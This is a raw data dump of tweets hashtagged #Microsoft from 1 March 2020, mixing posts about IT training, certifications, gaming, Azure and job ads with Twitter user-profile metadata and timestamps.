    <t>{'id': 915573300193107968, 'id_str': '915573300193107968', 'name': 'Tony Galati', 'screen_name': 'MyCCTonyGalati', 'location': 'Holly Springs, NC', 'description': '', 'url': 'https://t.co/0Pr0RH31va', 'entities': {'url': {'urls': [{'url': 'https://t.co/0Pr0RH31va', 'expanded_url': 'http://www.mycomputercareer.edu', 'display_url': 'mycomputercareer.edu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 46, 'friends_count': 16, 'listed_count': 0, 'created_at': 'Wed Oct 04 13:44:20 +0000 2017', 'favourites_count': 261, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2425, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/915934384963723264/4R_wt0sF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/915934384963723264/4R_wt0sF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/915573300193107968/1507210794',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</si>
  <si>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18:00:16 +0000 2020</t>
  </si>
  <si>
    <t>#MyComputerCareer offers essential courses from CompTIA, Cisco, and #Microsoft to #Linux and EC-Council, which will help you to excel in your #IT role. https://t.co/AjdYsjsJVo https://t.co/APo3FGUa2T</t>
  </si>
  <si>
    <t>{'id': 252988387, 'id_str': '252988387', 'name': 'MyComputerCareer', 'screen_name': 'mycompcareer', 'location': 'Raleigh, NC', 'description': 'Need motivation? Inspiration? Career Change? Our program is fast &amp; flexible. No experience required. Click on the link to take our FREE career evaluation.', 'url': 'https://t.co/2ISglSGC7B', 'entities': {'url': {'urls': [{'url': 'https://t.co/2ISglSGC7B', 'expanded_url': 'http://mycomputercareer.edu', 'display_url': 'mycomputercareer.edu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1770, 'friends_count': 1280, 'listed_count': 4, 'created_at': 'Wed Feb 16 09:58:44 +0000 2011', 'favourites_count': 518, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2864,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'http://pbs.twimg.com/profile_images/1141379806539538432/lZ-J5U1K_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141379806539538432/lZ-J5U1K_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/252988387/1534270587',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</si>
  <si>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18:00:15 +0000 2020</t>
  </si>
  <si>
    <t>#MyComputerCareer offers essential courses from CompTIA, Cisco, and #Microsoft to #Linux and EC-Council, which will help you to excel in your #IT role. https://t.co/y0cOXBLU86 https://t.co/HxLfroF8eq</t>
  </si>
  <si>
    <t>{'id': 915568014443073536, 'id_str': '915568014443073536', 'name': 'MyComputerCareer', 'screen_name': 'MyCCMilitary', 'location': 'Raleigh, NC', 'description': 'It is an honor to serve those who have served. Committed to helping Veterans transition to civilian life. Click on the link to take our FREE career evaluation!', 'url': 'https://t.co/frwaT9t3TI', 'entities': {'url': {'urls': [{'url': 'https://t.co/frwaT9t3TI', 'expanded_url': 'http://www.mycomputercareer.edu/military', 'display_url': 'mycomputercareer.edu/military', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 51, 'friends_count': 74, 'listed_count': 0, 'created_at': 'Wed Oct 04 13:23:19 +0000 2017', 'favourites_count': 202, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3024, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/987098536859914243/QOJh16-Z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/987098536859914243/QOJh16-Z_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/915568014443073536/1534289127',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</si>
  <si>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17:55:48 +0000 2020</t>
  </si>
  <si>
    <t>@VessOnSecurity Once again the problem is giving people the options to actually make the wrong choice... take it away. Set as default. #Microsoft</t>
  </si>
  <si>
    <t>Sun Mar 01 17:55:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is retiring its MCSA, MCSD and MCSE certifications in June 2020 : https://t.co/1KOruOES8u #Microsoft Comments: https://t.co/lktG2f00ml</t>
  </si>
  <si>
    <t>{'id': 702365900310253569, 'id_str': '702365900310253569', 'name': 'Hacker News', 'screen_name': 'hacker_news_hir', 'location': '', 'description': 'Facebook mirror page:  https://t.co/OXolU6Aphx', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/OXolU6Aphx', 'expanded_url': 'https://www.facebook.com/hn.hiren.news/', 'display_url': 'facebook.com/hn.hiren.news/', 'indices': [23, 46]}]}}, 'protected': False, 'followers_count': 310, 'friends_count': 0, 'listed_count': 434, 'created_at': 'Wed Feb 24 05:34:14 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 131562,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'http://pbs.twimg.com/profile_images/702366612574310401/2aGa7WKL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/702366612574310401/2aGa7WKL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/702365900310253569/1461211751',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</si>
  <si>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17:53:16 +0000 2020</t>
  </si>
  <si>
    <t>HTC trying to win the customers with oldest possible #port !!
#htc #htcwildfire #smartphone #microusb #triplecamera #google #alphabet #ceo #sundarpichai #larrypage #schmidt #apple #microsoft #samsung #oneplus #huawei #xiaomi #android 
 https://t.co/AOwj5zhp5a</t>
  </si>
  <si>
    <t>Sun Mar 01 17:48:25 +0000 2020</t>
  </si>
  <si>
    <t>#askjack
Bought a #microsoft pro surface In may 2019 
I am already on the third power lead 
What happens when the warranty runs out as i cannot afford 75 to replace the led</t>
  </si>
  <si>
    <t>{'id': 20050441, 'id_str': '20050441', 'name': 'joseph langton', 'screen_name': 'jnlangton', 'location': 'middle england', 'description': 'every word is like a stain on silence and nothingness', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1641, 'friends_count': 3279, 'listed_count': 44, 'created_at': 'Wed Feb 04 12:57:01 +0000 2009', 'favourites_count': 113, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 71427,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'http://pbs.twimg.com/profile_images/981236928761749504/4RvPaw5d_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/981236928761749504/4RvPaw5d_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20050441/1522583148',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</si>
  <si>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17:45:04 +0000 2020</t>
  </si>
  <si>
    <t>Will the #virus cause a #recession 
@GarryWhite looks at the events that have shaped markets this week, including: #coronavirus #airlines #Italy #Brexit #Microsoft #Mastercard #tech #IPOs #Disney #Barclays and much more. Read his weekly round-up on  https://t.co/Zegu4fuImW https://t.co/jHpZ7FIIHf</t>
  </si>
  <si>
    <t>Sun Mar 01 17:45:02 +0000 2020</t>
  </si>
  <si>
    <t>This guide shows you how to create VM groups with PowerShell cmdlet, how to add group members, retrieving groups and members, and potential obstacles #Microsoft #HyperV https://t.co/6jfx0rBKLJ</t>
  </si>
  <si>
    <t>Sun Mar 01 17:43:33 +0000 2020</t>
  </si>
  <si>
    <t>PSA: Microsoft has Season 1 of DBZ for free  #microsoft #xbox</t>
  </si>
  <si>
    <t>{'id': 114402065, 'id_str': '114402065', 'name': 'Lord Gyza', 'screen_name': 'IggyDestroyer', 'location': 'Abyss', 'description': 'âš¡ï¸GyZa Studiosâš¡ï¸à¼ Multimedia Artist à¼ ðŸ‘»:2gnarly4u à¼ Bitcoin/Altcoin/Blockchain enthusiast à¼  Gamer and Streamer', 'url': 'https://t.co/GDZ0F32HgJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/GDZ0F32HgJ', 'expanded_url': 'http://www.instagram.com/gyzastudios', 'display_url': 'instagram.com/gyzastudios', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1169, 'friends_count': 2080, 'listed_count': 10, 'created_at': 'Mon Feb 15 08:34:41 +0000 2010', 'favourites_count': 15660, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16709, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1A1B1F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/952256793912123392/nL3dnt3M_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/952256793912123392/nL3dnt3M_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/114402065/1525472383', 'profile_link_color': '2FC2EF',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</si>
  <si>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PHI-Microsoft Press Series - Designed for the different ways you learn
 Exam Ref  Inside Out  Plain and Simple
 Step By Step  Business Skills  Training Guide
Read our popular book: https://t.co/IqibXPUhKc
#microsoft #PHIBooks #microsoftpress https://t.co/Kp0dzrC86x</t>
  </si>
  <si>
    <t>{'id': 179583019, 'id_str': '179583019', 'name': 'PHI Learning', 'screen_name': 'philearning', 'location': 'New Delhi, India', 'description': 'Helping Teachers to Teach and Students to Learn with quality texts on wide range of subjects', 'url': 'http://t.co/87oPqBacfM', 'entities': {'url': {'urls': [{'url': 'http://t.co/87oPqBacfM', 'expanded_url': 'http://www.phindia.com/', 'display_url': 'phindia.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 169, 'friends_count': 140, 'listed_count': 12, 'created_at': 'Tue Aug 17 17:05:19 +0000 2010', 'favourites_count': 250, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4738,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'http://pbs.twimg.com/profile_images/470151649017602048/QcOCZ6Ky_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/470151649017602048/QcOCZ6Ky_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/179583019/1559790041',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</si>
  <si>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Sun Mar 01 17:41:08 +0000 2020</t>
  </si>
  <si>
    <t>symbolic move for #IBM and #Microsoft as they pledge to make ethical #AI
https://t.co/UolsXfvb3Y</t>
  </si>
  <si>
    <t>{'id': 636516465, 'id_str': '636516465', 'name': 'Roberto Battistoni', 'screen_name': 'RobBattistoni', 'location': 'London', 'description': 'IBM Consumer Products Lead (UK) - Passion for Sustainability and AI in CPG and Retail - Work for IBM but tweets are my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 195, 'friends_count': 497, 'listed_count': 4, 'created_at': 'Sun Jul 15 20:28:28 +0000 2012', 'favourites_count': 352, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 933,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'http://pbs.twimg.com/profile_images/705301708956672000/YlMGD2eo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/705301708956672000/YlMGD2eo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/636516465/1566238480',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</si>
  <si>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17:40:03 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 17:39:38 +0000 2020</t>
  </si>
  <si>
    <t>Why dont ya tap that like, retweet, and follow like i tap these two guys! Im telling you know other gamer/content creator is pushing out content like The Den! #PUBG #XboxOne #Xbox #Microsoft #Mixer #streamer #gamer #double #kill https://t.co/72Aq1TzShM</t>
  </si>
  <si>
    <t>Sun Mar 01 17:36:02 +0000 2020</t>
  </si>
  <si>
    <t>Join our @NICECompliance and @Microsoft compliance 'rock stars' for a forum dedicated to #Cloud and #Teams. Its your last chance to register  click here to learn more &amp;gt;&amp;gt;  https://t.co/2UfBq7NJkZ
#NICECompliance #NetworkwithNICE #Microsoft #Compliance
https://t.co/uz3lQd565c</t>
  </si>
  <si>
    <t>{'id': 117793571, 'id_str': '117793571', 'name': 'Reddi Babu', 'screen_name': 'reddibabu1983', 'location': 'Bengaluru South, India', 'description': 'Senior software Engineer at Nice systems', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 71, 'friends_count': 550, 'listed_count': 4, 'created_at': 'Fri Feb 26 16:48:31 +0000 2010', 'favourites_count': 121, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3321,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'http://pbs.twimg.com/profile_images/1157265080330776576/Py-1Ern0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1157265080330776576/Py-1Ern0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/117793571/1565300012',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</si>
  <si>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17:25:00 +0000 2020</t>
  </si>
  <si>
    <t>GTA5 With JuLz Be Like.......
#Mixer #Mixerstreamer #Mixerlover #MixerForLife #WatchMixer #ContentCreator #Gamer #Gaming #babygamer #Bronx #NYC  #Xbox #XboxOne #XboxOneX #Microsoft #PS4 #Playstation4 #Sony #pc #microsoft #gta5  #BPG #BloodPackGaming @watchmixer @nzxt @gta5 https://t.co/tOkL7b2VF1</t>
  </si>
  <si>
    <t>Sun Mar 01 17:22:01 +0000 2020</t>
  </si>
  <si>
    <t>The #Microsoft Global Social Entrepreneurship Program #SocEnt https://t.co/rXOLssF1rR</t>
  </si>
  <si>
    <t>{'id': 3387195124, 'id_str': '3387195124', 'name': 'John MacÃ­asPrada', 'screen_name': 'JohnEmprende', 'location': 'MedellÃ­n, Antioquia', 'description': 'SociÃ³logo, politÃ³logo, administrador. #Innovation #SocialEntrepreneurship #SocialBusiness #SocialEnterprise Universidad @EAFIT', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 165, 'friends_count': 1799, 'listed_count': 4, 'created_at': 'Wed Jul 22 11:17:26 +0000 2015', 'favourites_count': 155, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 805,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'http://pbs.twimg.com/profile_images/1068181222164185093/ajSxBso4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1068181222164185093/ajSxBso4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3387195124/1437566507',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</si>
  <si>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17:13:37 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is retiring its MCSA, MCSD and MCSE #certifications in June 2020 | ZDNet https://t.co/QOn6Cm8LVD</t>
  </si>
  <si>
    <t>{'id': 2875571991, 'id_str': '2875571991', 'name': 'Richard Alamino', 'screen_name': 'Alamino_PCTech', 'location': 'Florida, USA', 'description': 'Curious about #InformationTechnology #ComputerSupport #NetworkingSystem #SocialMedia #Business but trying my best in every single step.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 138, 'friends_count': 73, 'listed_count': 54, 'created_at': 'Thu Nov 13 20:36:27 +0000 2014', 'favourites_count': 804, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1306,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'http://pbs.twimg.com/profile_images/1210801301153439744/KpGHlAg4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210801301153439744/KpGHlAg4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2875571991/1577428790',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</si>
  <si>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17:09:55 +0000 2020</t>
  </si>
  <si>
    <t>Throwback 2008: A photo of Josh Crawfords greatest artistic achievement. I fear the primal may be lost to time. 
#throwback #art #microsoft #xbox #highart https://t.co/P8ur0EGl7j</t>
  </si>
  <si>
    <t>{'id': 136637122, 'id_str': '136637122', 'name': 'Drake Tucker', 'screen_name': 'DrakeTucker2', 'location': 'Nebraska', 'description': 'Film Editor with a Flock of Ducks', 'url': 'https://t.co/LHUc95UjOo', 'entities': {'url': {'urls': [{'url': 'https://t.co/LHUc95UjOo', 'expanded_url': 'http://www.draketucker.com', 'display_url': 'draketucker.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 124, 'friends_count': 153, 'listed_count': 4, 'created_at': 'Sat Apr 24 13:48:00 +0000 2010', 'favourites_count': 7507, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2532,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'http://pbs.twimg.com/profile_images/872520093510586368/P2bviT4-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/872520093510586368/P2bviT4-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/136637122/1568054173', 'profile_link_color': '000080',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</si>
  <si>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Sun Mar 01 17:05:56 +0000 2020</t>
  </si>
  <si>
    <t>Honored to connect at #csforAllJROTC with representatives from #google #lockheedmartin #intel and #microsoft to hear about opportunities for NFA scholars. #nfa #nfacte #nfacte #computerscience https://t.co/xHj1TYuvHI</t>
  </si>
  <si>
    <t>{'id': 865939183029932037, 'id_str': '865939183029932037', 'name': 'NFACS&amp;MD', 'screen_name': 'ecappellonecsd', 'location': 'Newburgh, NY', 'description': 'Newburgh Free Academy Computer Science &amp; Motion Design. Teaching award winning #motiondesigners and front-end web developers. #nfacsmdðŸ’»', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 142, 'friends_count': 975, 'listed_count': 1, 'created_at': 'Sat May 20 14:36:04 +0000 2017', 'favourites_count': 1081, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 306,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'http://pbs.twimg.com/profile_images/1148988790305955840/zbsRnokx_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148988790305955840/zbsRnokx_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/865939183029932037/1536447960',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</si>
  <si>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17:01:36 +0000 2020</t>
  </si>
  <si>
    <t>If you're looking for your next #Microsoft #tech job, we can help! 
Upload your resume and let us do the rest: https://t.co/dCsmO0iWMv https://t.co/QKmiyTaT5h</t>
  </si>
  <si>
    <t>Sun Mar 01 17:01:25 +0000 2020</t>
  </si>
  <si>
    <t>How To Disable Media AutoPlay in Microsoft Edge Browser. Read more - https://t.co/d5R9CjYPnD #Microsoft #edge #howto #ravelingtech https://t.co/csUjRfHD5Q</t>
  </si>
  <si>
    <t>{'id': 1130317091427348480, 'id_str': '1130317091427348480', 'name': 'Raveling Tech', 'screen_name': 'BintechMr', 'location': 'Patna, India', 'description': 'Raveling Tech is a technology blog which shares cool tech How-To Guide and Tutorials, how to fix tech and also help you to buy the tech out of all.ðŸ‘©\u200dðŸ’»ðŸ‘¨\u200dðŸ’»', 'url': 'https://t.co/AMipBoHZyQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/AMipBoHZyQ', 'expanded_url': 'https://www.ravelingtech.com/', 'display_url': 'ravelingtech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16, 'friends_count': 71, 'listed_count': 1, 'created_at': 'Mon May 20 03:39:29 +0000 2019', 'favourites_count': 1603, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 218, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1209825210641158144/Qt1-Av0M_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209825210641158144/Qt1-Av0M_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1130317091427348480/1577279784',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</si>
  <si>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17:00:24 +0000 2020</t>
  </si>
  <si>
    <t>If you observe high page load times when using hierarchical filters, remove the #hierarchicalfilters &amp;amp; instead use multiple filters for the hierarchy. https://t.co/M3Nal6aHL0 #powerBI #microsoft #powerapps #data #AI #azure #pageloading #bigdata #dataanalytics #ml #datascience https://t.co/ItUVxzboNQ</t>
  </si>
  <si>
    <t>Sun Mar 01 17:00:13 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPFjt0 https://t.co/67JdHDSAI8</t>
  </si>
  <si>
    <t>Sun Mar 01 17:00:01 +0000 2020</t>
  </si>
  <si>
    <t>'Test and listen: Microsofts Jim Weinstein on healthcare tech'
https://t.co/rekydITc13
Visit us at: https://t.co/DCG91lIjCQ
#Test #Listen #Microsoft #Healthcare #Tech #CIT #CITtech #CITinclusion #CITdiversity https://t.co/OPwqKgDk8g</t>
  </si>
  <si>
    <t>{'id': 1137295724, 'id_str': '1137295724', 'name': 'Contracts IT', 'screen_name': 'ContractsIT13', 'location': 'London', 'description': 'Award winning global tech #staffing agency #recruiting #diversity #Inclusive #IT #Tech Follow us for #tech, #IT #career #jobs #techforgood @Womenintech_CIT', 'url': 'https://t.co/7UTbzBP2lX', 'entities': {'url': {'urls': [{'url': 'https://t.co/7UTbzBP2lX', 'expanded_url': 'http://www.contractsit.com', 'display_url': 'contractsit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1953, 'friends_count': 1361, 'listed_count': 367, 'created_at': 'Thu Jan 31 16:04:19 +0000 2013', 'favourites_count': 5682, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11608,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'http://pbs.twimg.com/profile_images/1037619799390601216/Vv80CzAi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1037619799390601216/Vv80CzAi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1137295724/1455022979',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</si>
  <si>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Sun Mar 01 17:00:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, the #ID2020 Alliance, universal #DigitalIdentification and you. #cybersecurity #surveillance #privacy https://t.co/kq2H1PHrrL</t>
  </si>
  <si>
    <t>{'id': 3037066730, 'id_str': '3037066730', 'name': 'Geopolitics &amp; Empire', 'screen_name': 'Geopolitics_Emp', 'location': 'The Heartland', 'description': 'Interviews with experts on geopolitics and global affairs. SoundCloud https://t.co/CV2WfXqbDe YouTube https://t.co/SoSjpc12im Newsletter https://t.co/1R6eM5s0ja', 'url': 'https://t.co/Vpya4By7mD', 'entities': {'url': {'urls': [{'url': 'https://t.co/Vpya4By7mD', 'expanded_url': 'http://GeopoliticsAndEmpire.com', 'display_url': 'GeopoliticsAndEmpire.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/CV2WfXqbDe', 'expanded_url': 'http://bit.ly/2vLMHrN', 'display_url': 'bit.ly/2vLMHrN', 'indices': [70, 93]}, {'url': 'https://t.co/SoSjpc12im', 'expanded_url': 'http://bit.ly/2wOuflP', 'display_url': 'bit.ly/2wOuflP', 'indices': [102, 125]}, {'url': 'https://t.co/1R6eM5s0ja', 'expanded_url': 'http://bit.ly/2tc6vY1', 'display_url': 'bit.ly/2tc6vY1', 'indices': [137, 160]}]}}, 'protected': False, 'followers_count': 3243, 'friends_count': 5000, 'listed_count': 69, 'created_at': 'Sun Feb 22 23:55:05 +0000 2015', 'favourites_count': 398, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 21997,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'http://pbs.twimg.com/profile_images/941145777543503872/Gty5k3L8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/941145777543503872/Gty5k3L8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3037066730/1550513892',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</si>
  <si>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16:52:03 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 16:48:05 +0000 2020</t>
  </si>
  <si>
    <t>Free Azure Certification Exam Self Assessment Tools
 #MCP #study #Microsoft #AzureFamily
https://t.co/EEminCqjoe</t>
  </si>
  <si>
    <t>Sun Mar 01 16:48:04 +0000 2020</t>
  </si>
  <si>
    <t>Today, I have received the #MVP Award in the category of AI.  I am so happy to become part of the #Microsoft #MVP family and contribute and share knowledge with the #community.  Thank you! #AI #mvpbuzz #mvps #microsoft #2020 #award #transforming https://t.co/1TN3ExWIiz</t>
  </si>
  <si>
    <t>{'id': 869549024113823745, 'id_str': '869549024113823745', 'name': 'Ekaterina Marinova', 'screen_name': 'EkaterinaMarino', 'location': 'Bulgaria', 'description': 'Microsoft MVP AI, Data Analyst @ Raiffeisen Bank Bulgaria and Lecturer @ American University in Bulgaria', 'url': 'https://t.co/j1BP4Ggj4d', 'entities': {'url': {'urls': [{'url': 'https://t.co/j1BP4Ggj4d', 'expanded_url': 'http://www.linkedin.com/in/ekaterina-marinova-bg', 'display_url': 'linkedin.com/in/ekaterina-mâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 220, 'friends_count': 270, 'listed_count': 3, 'created_at': 'Tue May 30 13:40:17 +0000 2017', 'favourites_count': 144, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1189432381637312513/WvZGBFKa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189432381637312513/WvZGBFKa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/869549024113823745/1545893809',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</si>
  <si>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16:48:03 +0000 2020</t>
  </si>
  <si>
    <t>Join our @NICECompliance and @Microsoft compliance 'rock stars' for a forum dedicated to #Cloud and #Teams. Its your last chance to register  click here to learn more &amp;gt;&amp;gt;  https://t.co/aDar7m1XLB
#NICECompliance #NetworkwithNICE #Microsoft #Compliance
https://t.co/2eZgJSObQt</t>
  </si>
  <si>
    <t>Sun Mar 01 16:46:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's new Office Build 12619.20002 for Windows brings new features to #Outlook and #PowerPoint   https://t.co/qPqjmqdOjB by @NonsenseC_UAA</t>
  </si>
  <si>
    <t>Sun Mar 01 16:45:27 +0000 2020</t>
  </si>
  <si>
    <t>Great prediction stick by HLO admin @Paul_Tanner_. For more content like this, check out his future broadcasts at https://t.co/Tk5psSNJuz 
#Halo #Halo2 #Halo2Classic #H2C #Lockout #FFA #LoneWolves #Stick #Stuck #PlasmaGrenade #MCC #Xbox #Mixer #Microsoft #VideoGames #FPS https://t.co/9JcqVC4j1P</t>
  </si>
  <si>
    <t>{'id': 2885117009, 'id_str': '2885117009', 'name': 'HLO', 'screen_name': 'Halo_Lives_On', 'location': 'Global', 'description': 'The official Twitter feed for the @Halo Lives On community with over 10,000 members! Account run by @DiamondJordyUK.   Founded by @Paul_Tanner_ in 2013.', 'url': 'https://t.co/d3GNtIhO9F', 'entities': {'url': {'urls': [{'url': 'https://t.co/d3GNtIhO9F', 'expanded_url': 'http://facebook.com/groups/Halo.Lives.On', 'display_url': 'facebook.com/groups/Halo.Liâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 239, 'friends_count': 296, 'listed_count': 4, 'created_at': 'Thu Nov 20 01:28:50 +0000 2014', 'favourites_count': 1125, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 913,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'http://pbs.twimg.com/profile_images/1012626924970151936/2SBgeG4I_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1012626924970151936/2SBgeG4I_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2885117009/1504563439',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</si>
  <si>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16:43:41 +0000 2020</t>
  </si>
  <si>
    <t>We developed this #biometric application using #Microsoft C#, #OracleDatabase #SecuGenSDK (Fingerprint Device),
#AForgeVideo Libraries (PC Camera), It can work as Embedded or Standalone #apps. If you need an #electronic programming conatact us @ https://t.co/42JYAjx8Jl  #Software https://t.co/6L2ewsBWOo</t>
  </si>
  <si>
    <t>{'id': 823940073729196036, 'id_str': '823940073729196036', 'name': 'Webmasters', 'screen_name': 'webmastersNG', 'location': 'Lagos, Nigeria', 'description': 'Software, Web and Mobile Developer with love for internet of things , hacking, Cybersecurity, Linux, Reserach, Cars &amp; Law Court Drama', 'url': 'https://t.co/fZG7Cy0LMT', 'entities': {'url': {'urls': [{'url': 'https://t.co/fZG7Cy0LMT', 'expanded_url': 'https://www.webmastersng.com', 'display_url': 'webmastersng.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 63, 'friends_count': 34, 'listed_count': 4, 'created_at': 'Tue Jan 24 17:06:36 +0000 2017', 'favourites_count': 71, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 558,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'http://pbs.twimg.com/profile_images/959458268966989824/WgUKh5YQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/959458268966989824/WgUKh5YQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/823940073729196036/1583017897',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</si>
  <si>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16:42:25 +0000 2020</t>
  </si>
  <si>
    <t>SQL Server runs best on Azure. Heres why.
https://t.co/ffDEjUcCgY
#Microsoft #Azure #Cloud #SQLServer #SQLonAzure</t>
  </si>
  <si>
    <t>Sun Mar 01 16:41:39 +0000 2020</t>
  </si>
  <si>
    <t>"Windows 10 Updates: Home Users Are Baffled" https://t.co/hi6r2QIQq9 #Microsoft #Windows10 https://t.co/HiBzuBoOYH</t>
  </si>
  <si>
    <t>Sun Mar 01 16:41:35 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 16:33:36 +0000 2020</t>
  </si>
  <si>
